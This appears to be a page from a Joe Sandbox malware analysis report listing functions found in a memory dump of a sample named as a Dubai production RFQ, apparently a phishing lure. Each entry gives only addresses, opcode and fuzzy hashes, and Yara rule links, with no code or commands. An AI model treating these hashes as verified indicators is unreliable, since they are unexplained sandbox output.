Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction ID: e8f2a358293b694b07e01fb2ad7048178d12091cdcf22a9d9ab17e883a2602e3
Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction Fuzzy Hash: A6E08C359406849FDB12DB49CA40F5ABBB6BB80B00F180448A1086B360D326E900CB40

Function 0163E4BC Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction ID: d06a5437af6c6e8540b6861a907a59f9abacc9d2e1a61dcbb0a256578f60765e
Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction Fuzzy Hash: 93D0A932214610AFC732AA1CFC00FC333E9BBA8B31F06045DB009C7261C364EC81CA84

Function 015FA093 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction ID: 42d71e0098cb9b1a4a0171efabb08736eddbfbadd995f45c0c30f5756d8f2ea3
Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction Fuzzy Hash: 0BD0223220303093CB382644BD10F677909FF81AA0F0A002C3A0EC7904C1008C42C2E1

Function 0163A750 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction ID: 3ee6c1be8629de229ed2d28a6f52a4c37618ca1945d44bf0141881e0177e2c86
Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction Fuzzy Hash: 92D012371D054DBBCB119F65DC01F957BA9F7A5B60F044020B505875A0DA3AE950D584

Function 016101C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction ID: a97f6b90279456e278b272d84bcb9b19575f854ebd89433da78974c6ef05cb3f
Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction Fuzzy Hash: 75D0C935312D80DFD61BCB0DC894B0533A8BB44B40F850490F801CB726D72CD980CA00

Function 01620230 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 74c74ef14f39bf48657c4b27bd6c7dc8866dba0c6e1af9b1f38907a711dd77d1
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 1CD0123610064CEFCB05DF40C850D5A7B2BFFD8710F108019FD19076108A31ED62DA54

Function 0162332D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
Instruction ID: 62389274b48377fd2308752bebcc03ff1b5951b522eda8f693b836cddcdf3db0
Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
Instruction Fuzzy Hash: 23C08C70141AC06AEB2B5B04CD10B283A54BB19A05F88019CEB011D7A2C76FDA018A08

Function 01644260 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6580c85f2e6e52395249f2c4e79757f5231ee36d6f57ff236cb3baa499ffe6
Instruction ID: 549b58cde1d10cffe72da4f1151d0fb0f464d46f0912c454f1bf1908b1b80368
Opcode Fuzzy Hash: ea6580c85f2e6e52395249f2c4e79757f5231ee36d6f57ff236cb3baa499ffe6
Instruction Fuzzy Hash: B890023160550022968075595D845474009E7E0301F52C415E4424694CCA2489566361

Function 01644570 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34d9a3de10ac736a851a408216b360cccdc3dc0e582959e5e951cfba038444a
Instruction ID: 5b72753373fb8dc73b1521abce4c104a417a2014f26402ab02c32b4ce86a1d0d
Opcode Fuzzy Hash: a34d9a3de10ac736a851a408216b360cccdc3dc0e582959e5e951cfba038444a
Instruction Fuzzy Hash: D790026160120052468075595D044076009E7E1301792C519A45546A0CC6288855A269

Function 016429F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b27d282473fb94f74406e7b24d470be6fe0fa7f739acc74514c57be6c09f08
Instruction ID: 6f778c4733204f8849f07c51960f1ef8045de80aaba9b69db1a455944b1f6ac6
Opcode Fuzzy Hash: 66b27d282473fb94f74406e7b24d470be6fe0fa7f739acc74514c57be6c09f08
Instruction Fuzzy Hash: C1900225211100130645A9591B04507004AD7D5351752C425F5015690CD63188616121

Function 016429D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3751a7951e8d02243b6d7c39d32ed3094d9af0ebda2d5558868d7984780ddacf
Instruction ID: 35eb2426cdf89e8abc218ca1d67941c184cd6ffe9ae715eb523204c8ff4d5943
Opcode Fuzzy Hash: 3751a7951e8d02243b6d7c39d32ed3094d9af0ebda2d5558868d7984780ddacf
Instruction Fuzzy Hash: A69002A1201240A24A40A6599904B0B4509D7E0201F52C41AE50546A0CC5358851A135

Function 016438D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26b1ed32a7f0dd6063e2b98d2552f58096b0e8748a6b1b6d9ed8686b8ec6d19e
Instruction ID: 3b9046ada0e1d61ec1b7740e06f51de1f660cc61aec26566cdd921dd5482b6b9
Opcode Fuzzy Hash: 26b1ed32a7f0dd6063e2b98d2552f58096b0e8748a6b1b6d9ed8686b8ec6d19e
Instruction Fuzzy Hash: 9390022124515112D690755D59046174009F7E0201F52C425A48146D4DC56588557221

Function 01642B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62db0a1e5e5f7ed62d0d55a65e6ff604f6d3ee8e4b532e4a4bb9b2814ac5b919
Instruction ID: 167c5ed168ada0df076ed35283bc81e8b5471ff39bbd7c22f71b960887a415a2
Opcode Fuzzy Hash: 62db0a1e5e5f7ed62d0d55a65e6ff604f6d3ee8e4b532e4a4bb9b2814ac5b919
Instruction Fuzzy Hash: A590023120514852D68075595904A470019D7D0305F52C415A40647D4DD6358D55B661

Function 01642B10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d964b53706047a97868937047f44c9e037fc0185d58f0d6cffd6ce563094336
Instruction ID: 7fe1196bdcea8760e7eb7c37c4920f41d23ef99e7b01be3eb53d1769a2829bf7
Opcode Fuzzy Hash: 0d964b53706047a97868937047f44c9e037fc0185d58f0d6cffd6ce563094336
Instruction Fuzzy Hash: 6090023120110812D6C07559590464B0009D7D1301F92C419A4025794DCA258A5977A1

Function 01642BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae2bdc59daf7e3ab34140f0a37853d2f30eba0edbc912361098a9836570ede2
Instruction ID: 847e54d23a24d8ffb51038199eb2748083efdde77fb22a5c40bf278b2eaf9098
Opcode Fuzzy Hash: fae2bdc59daf7e3ab34140f0a37853d2f30eba0edbc912361098a9836570ede2
Instruction Fuzzy Hash: 6690022160510412D680755969187070019D7D0201F52D415A4024694DC6698A5576A1

Function 01642BC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8e4ccc55f4e07bc672bd9bfef35eedcf2d65b6ad58cdc9a5c9e9342d2bffbe
Instruction ID: ac47ccf35218b5435e049b56c9cd577b7f5fb9ff6c7ae117884dcfd5dc4e3307
Opcode Fuzzy Hash: 2d8e4ccc55f4e07bc672bd9bfef35eedcf2d65b6ad58cdc9a5c9e9342d2bffbe
Instruction Fuzzy Hash: F690023120110412D640699969086470009D7E0301F52D415A9024695EC67588917131

Function 01642B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c9799b1641e24aed787409db0c04dd52d7e8752fd3842067a3e5e088bdcac6
Instruction ID: f5dbc412b1b1d6496c011aa845da8cf88cfe4eb7a1f3c1699f6b39a458027fb1
Opcode Fuzzy Hash: 52c9799b1641e24aed787409db0c04dd52d7e8752fd3842067a3e5e088bdcac6
Instruction Fuzzy Hash: 8E90023120110852D64065595904B470009D7E0301F52C41AA4124794DC625C8517521

Function 01642A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc7596bdfaabed205f246d49de0f116959ac0806975551a2f84c53a9f6e8c78
Instruction ID: 3c67306bfa4acd03c805b8e0008fe97abe9247dc9c476d231c7b23d554dd60bb
Opcode Fuzzy Hash: cbc7596bdfaabed205f246d49de0f116959ac0806975551a2f84c53a9f6e8c78
Instruction Fuzzy Hash: 5F900225221100120685A9591B0450B0449E7D6351792C419F54166D0CC63188656321

Function 01642AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f9c4f3554ce86077fbaac0e49a273b3a3955d7d13657acf34bafad0d4fded3
Instruction ID: e12768ed2ca130568cf647cab12f6962ce7ae826d6a48e43b8537c91aec9d567
Opcode Fuzzy Hash: 63f9c4f3554ce86077fbaac0e49a273b3a3955d7d13657acf34bafad0d4fded3
Instruction Fuzzy Hash: 3790023160510812D690755959147470009D7D0301F52C415A4024794DC7658A5576A1

Function 01642AA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c80232632aa4dde84b00d97c9c1e4df917884ad1fc3a7b8b42a959cebf37f7
Instruction ID: 26eceddda73ea7ed8764342a2a4d9b803abb95eff49c723ab3b1c14d90dd0696
Opcode Fuzzy Hash: 62c80232632aa4dde84b00d97c9c1e4df917884ad1fc3a7b8b42a959cebf37f7
Instruction Fuzzy Hash: 2790023120110812D64465595D046870009D7D0301F52C415AA024795ED67588917131

Function 01642D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c4cef0e284a892106b8085260ed030b2a3fac6604943ef29fa11f5dbf25ad7
Instruction ID: fc9e0f7ceb3b9b3a9a116dd6be36226e683b5075bacd6fa0cffbaae9ab255e12
Opcode Fuzzy Hash: f7c4cef0e284a892106b8085260ed030b2a3fac6604943ef29fa11f5dbf25ad7
Instruction Fuzzy Hash: 5490022130110412D64265595914607000DD7D1345F92C416E5424695DC6358953B132

Function 01642DC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5107e395ad22b16a941a948785f2f5753cbf215be56dd93b693f9177712e3907
Instruction ID: 5c078797d6c6bf8ac6eaa0d34dd9d584a0a1c79e38a0f981688a03a4cebbcb40
Opcode Fuzzy Hash: 5107e395ad22b16a941a948785f2f5753cbf215be56dd93b693f9177712e3907
Instruction Fuzzy Hash: F290027120110412D680755959047470009D7D0301F52C415A9064694EC6698DD57665

Function 01642DA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f927218466b51f634421d12f384dc9e6cefc3ea087fcff1bde760a12486505a0
Instruction ID: 155eb64fc97512fdcb1660f97ef02cabbc60c32b5d4235182b6ce8407d88c377
Opcode Fuzzy Hash: f927218466b51f634421d12f384dc9e6cefc3ea087fcff1bde760a12486505a0
Instruction Fuzzy Hash: BD90022160110512D64175595904617000ED7D0241F92C426A5024695ECA358992B131

Function 01642C50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ae0b6a7ffc5dca14d7d6d46f467772ac1890739279a0a99dfeec5c5a24976b
Instruction ID: ddf0dd49f5d44db264aadccef70ca328fa7e0ac33075cf928a1371bd6139b2a3
Opcode Fuzzy Hash: 60ae0b6a7ffc5dca14d7d6d46f467772ac1890739279a0a99dfeec5c5a24976b
Instruction Fuzzy Hash: BE90022130110013D680755969186074009E7E1301F52D415E4414694CD92588566222

Function 01642C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27163b0b534d30ae68b275b5846c78548f338f60429e4376747d924bb0b35e1c
Instruction ID: aea904f334388c116fc980f75056a3497234cb63d93531f28078d5ee1c360c51
Opcode Fuzzy Hash: 27163b0b534d30ae68b275b5846c78548f338f60429e4376747d924bb0b35e1c
Instruction Fuzzy Hash: 1790022120514452D64069596908A070009D7D0205F52D415A50646D5DC6358851B131

Function 01642C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 666a42d1c3f5e34380ce728c5338cccfa0d2013339ac1cb2a2fc4ac147d1534c
Instruction ID: d685271562993e0fecf51576c2e8f5cfd9c03d07a6cb8987a253209410fcd20a
Opcode Fuzzy Hash: 666a42d1c3f5e34380ce728c5338cccfa0d2013339ac1cb2a2fc4ac147d1534c
Instruction Fuzzy Hash: F990022921310012D6C07559690860B0009D7D1202F92D819A4015698CC92588696321

Function 01643C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f8618debf01e95e366ffdea0db821a44b3f0a1f346dadb2fe797a65c91a0fee
Instruction ID: 516843253fb5c294284737551da92dced2f721f2e88af45dc0cac86d470a2bc4
Opcode Fuzzy Hash: 3f8618debf01e95e366ffdea0db821a44b3f0a1f346dadb2fe797a65c91a0fee
Instruction Fuzzy Hash: D3900231202101529A8066596D04A4F4109D7E1302F92D819A4015694CC92488616221

Function 01642C10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df214ec33484f4b334695670a2431fabd7d8702aba30ebb13de622cc969f2d0b
Instruction ID: 57175a635fe0db5b669570ecc424bfa4385853b3b0899ad933e0fd7d5b794e98
Opcode Fuzzy Hash: df214ec33484f4b334695670a2431fabd7d8702aba30ebb13de622cc969f2d0b
Instruction Fuzzy Hash: 8390023120110413D64065596A087070009D7D0201F52D815A4424698DD66688517121

Function 01642CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbdcf42ff958ba54e83d28f03b666c39d848784b4d1bba6c9b0a75a6978b742c
Instruction ID: 74e01d1b281522efee4153190f645838fd13d09343c43b26ae0febfd0f33986a
Opcode Fuzzy Hash: bbdcf42ff958ba54e83d28f03b666c39d848784b4d1bba6c9b0a75a6978b742c
Instruction Fuzzy Hash: E0900221242141625A85B5595904507400AE7E0241B92C416A5414A90CC5369856E621

Function 01642CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b42a0c08e5a24ac3900965cbde7907f07c050c4eb7e943c9e0cfa8ba7951e3
Instruction ID: 27468f0d9cceeece916dbb9fb409591a66fc2ec7557425305345edd763689d64
Opcode Fuzzy Hash: f8b42a0c08e5a24ac3900965cbde7907f07c050c4eb7e943c9e0cfa8ba7951e3
Instruction Fuzzy Hash: CE90023124110412D68175595904607000DE7D0241F92C416A4424694EC6658A56BA61

Function 01643C90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738ab50df7a2fd697cc79857fc15720b12f9b8dff8ae170475b44856e09b48ca
Instruction ID: bfcaf82f895b97913b5cbac6ec89944f6afd81d2a54073037b9c8c73c9406b48
Opcode Fuzzy Hash: 738ab50df7a2fd697cc79857fc15720b12f9b8dff8ae170475b44856e09b48ca
Instruction Fuzzy Hash: C790023520110412DA5065596D04647004AD7D0301F52D815A4424698DC66488A1B121

Function 01642F30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35e59f5310aac21300b448215c34e9db7e6bb4315b4606bd9c69c8bdd417371
Instruction ID: f9e3246c681e3d1ce82b379b1bec48051ba34a18d43b059374d5d7603f1ee816
Opcode Fuzzy Hash: c35e59f5310aac21300b448215c34e9db7e6bb4315b4606bd9c69c8bdd417371
Instruction Fuzzy Hash: 8290022120154452D68066595D04B0F4109D7E1202F92C41DA8156694CC92588556721

Function 01642F00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb4eeec4242a52b83c181e8375820f1de8d84bd5f649f4e57025c9afde16567
Instruction ID: dfcae36d49357d31e1b907ef214ed3d7424490b3e7305fabbf5f09036e09b7ea
Opcode Fuzzy Hash: ffb4eeec4242a52b83c181e8375820f1de8d84bd5f649f4e57025c9afde16567
Instruction Fuzzy Hash: 1F90022121190052D74069695D14B070009D7D0303F52C519A4154694CC92588616521

Function 01642FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78baf644aa2383b5370b26717bb0c8fbb520af7890c4776f2e1a0e78bed09663
Instruction ID: 46567e4bc460a6dc7a01b8cfdd47363fb626ae6e5860ba05016da1a1f5a92166
Opcode Fuzzy Hash: 78baf644aa2383b5370b26717bb0c8fbb520af7890c4776f2e1a0e78bed09663
Instruction Fuzzy Hash: 2D90022124110812D68075599914707000AD7D0601F52C415A4024694DC626896576B1

Function 01642E50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6038be9c20ba5ac60df53b3884a6260b42e46b708ce1d5da1144a5b198bbafb
Instruction ID: cb3bf59666d8f2bb28d89f6b1f294c508cc63fad111e812a03d524d14fb0a266
Opcode Fuzzy Hash: c6038be9c20ba5ac60df53b3884a6260b42e46b708ce1d5da1144a5b198bbafb
Instruction Fuzzy Hash: 3590026134110452D64065595914B070009D7E1301F52C419E5064694DC629CC527126

Function 01642E00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d51ad64c36d2b6b0705963b129d862a4176bbcbb4a975090736f4427b72d4b
Instruction ID: 4b7ff94c87a32645d2b12f1bf7abcc365ef41429e70f8c07e90b1270f5a75777
Opcode Fuzzy Hash: 43d51ad64c36d2b6b0705963b129d862a4176bbcbb4a975090736f4427b72d4b
Instruction Fuzzy Hash: 1390026120150413D68069595D046070009D7D0302F52C415A6064695ECA398C517135

Function 01642EC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

